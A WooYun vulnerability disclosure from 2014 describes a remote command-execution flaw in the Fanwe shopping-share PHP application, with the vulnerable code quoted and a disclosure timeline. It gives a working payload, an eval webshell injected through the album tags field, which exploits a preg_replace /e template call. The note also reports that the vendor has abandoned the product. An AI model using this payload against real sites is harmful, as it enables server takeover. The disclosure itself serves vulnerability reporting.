当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088871

漏洞标题:方维购物分享最新版前台代码漏洞

相关厂商:fanwe.com

漏洞作者: 0x_Jin

提交时间:2014-12-27 00:27

修复时间:2015-03-27 00:28

公开时间:2015-03-27 00:28

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-27: 细节已通知厂商并且等待厂商处理中
2014-12-30: 厂商已经确认,细节仅向厂商公开
2015-01-02: 细节向第三方安全合作伙伴开放
2015-02-23: 细节向核心白帽子及相关领域专家公开
2015-03-05: 细节向普通白帽子公开
2015-03-15: 细节向实习白帽子公开
2015-03-27: 细节向公众公开

简要描述:

一步两步似魔鬼的步伐

详细说明:

缺陷文件:
/core/function/global.func.php
如下:

/**
 * 显示页面
 * @param string $cache_file 缓存路径
 * @param bool $is_session 是否更新session
 * @param bool $is_return 是否返回页面内容
 * @return mixed
 */
function display($cache_file = '',$is_session = true,$is_return = false)
 
{
 
global $_FANWE;
 
$content = NULL;
 
if(!empty($cache_file) && !file_exists($cache_file))
 
{
 
if(makeDir(preg_replace("/^(.*)\/.*?\.htm$/is", "\\1", $cache_file)))
 
{
 
$dynamic_php = '';
 
if(isset($_FANWE['page_parses']))
 
$dynamic_php = "<?php\n".' $_FANWE[\'CACHE_CSS_SCRIPT_PHP\']'." = ".var_export($_FANWE['page_parses'], true).";\n?>";
 
 
 
$content = ob_get_contents();
 
express($content);
 
 
 
if(isset($_FANWE['tpl_image_formats']))
 
$dynamic_php .= "<?php\n".' setTplFormats(\'tpl_image_formats\','.var_export($_FANWE['tpl_image_formats'], true).");\n?>";
 
 
 
writeFile($cache_file,$dynamic_php.$content);
 
}
 
}
 
 
 
require_once fimport('dynamic/common');
 
$module_dynamic = '';
 
if(defined('MODULE_NAME') && MODULE_NAME != '')
 
$module_dynamic = fimport('dynamic/'.MODULE_NAME);
 
 
 
if(!empty($module_dynamic) && file_exists($module_dynamic))
 
require_once $module_dynamic;
 
 
 
if($content === NULL)
 
{
 
$content = ob_get_contents();
 
express($content);
 
}
 
ob_end_clean();
 
$content = preg_replace('/<!--dynamic\s+(.+?)(?:|\sargs=(.*?))-->/ies', "\\1('\\2');", $content);


最后的preg_replace 使用了/e的命令执行符号。
$content可被控制。
即页面上如果出现<!--dynamic args=(phpinfo())--> 即被执行args里的命令
寻找一个变量能被没有过滤掉关键字符之类,并且能在页面上显示的就行。
找了半天,找了个album.php的模块下的一个tags .
缺陷文件
/core/module/album.module.php 的300多行:

if($share['status'])
{
$data['title'] = htmlspecialchars($_FANWE['request']['title']);
$data['content'] = htmlspecialchars($_FANWE['request']['content']);
$data['tags'] = implode(' ',$tags);
$data['uid'] = $_FANWE['uid'];
$data['share_id'] = $share['share_id'];
$data['create_day'] = getTodayTime();
$data['create_time'] = TIME_UTC;
 
$aid = FDB::insert('album',$data,true);


Tags 变量只做了分割处理。分割字符串为空格即%20
前面的正则条件是需要匹配\s 即空白字符,其中包括\t \r \n 等
所以,提交tags标签时,提交如下类似的字符串即进入到模版缓存替换执行中。

<!--dynamic%09eval(@$_GET[test]);-->

本地测试如下图:

无标题.png


无标题.png


无标题.png

漏洞证明:

无标题.png


无标题.png


无标题.png

修复方案:

你们比我更专业~

版权声明:转载请注明来源 0x_Jin@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-12-30 15:47

厂商回复:

程序已暂停维护,不再销售

最新状态:

暂无